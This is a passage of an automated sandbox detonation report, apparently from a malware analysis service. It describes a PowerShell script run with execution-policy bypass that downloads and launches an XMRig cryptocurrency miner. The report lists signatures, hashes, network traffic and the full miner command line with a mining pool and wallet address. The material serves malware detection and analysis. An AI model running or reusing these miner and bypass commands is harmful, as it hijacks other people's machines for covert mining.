| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5044-25-0x00007FFE783E0000-0x00007FFE78DCC000-memory.dmp
memory/5044-48-0x00000236E46A0000-0x00000236E46B2000-memory.dmp
memory/5044-61-0x00000236E4500000-0x00000236E450A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:37
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1756s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3560 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3560 wrote to memory of 1592 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.173.189.20.in-addr.arpa | udp |
Files
memory/3560-0-0x00007FFA94B33000-0x00007FFA94B35000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yzzpmric.n5l.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win10-20240404-en
Max time kernel
1791s
Max time network
1758s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4556 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4556 wrote to memory of 3544 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mf2vqi2u.bse.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4556-25-0x00007FF88B790000-0x00007FF88C17C000-memory.dmp
memory/4556-48-0x0000024C2FEC0000-0x0000024C2FED2000-memory.dmp
memory/4556-61-0x0000024C2FEA0000-0x0000024C2FEAA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:38
Platform
win11-20240508-en
Max time kernel
1799s
Max time network
1763s
Command Line
Signatures
XMRig Miner payload
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4872 wrote to memory of 2440 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
Files
memory/4872-0-0x00007FFF618B3000-0x00007FFF618B5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_34tm1erx.20x.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |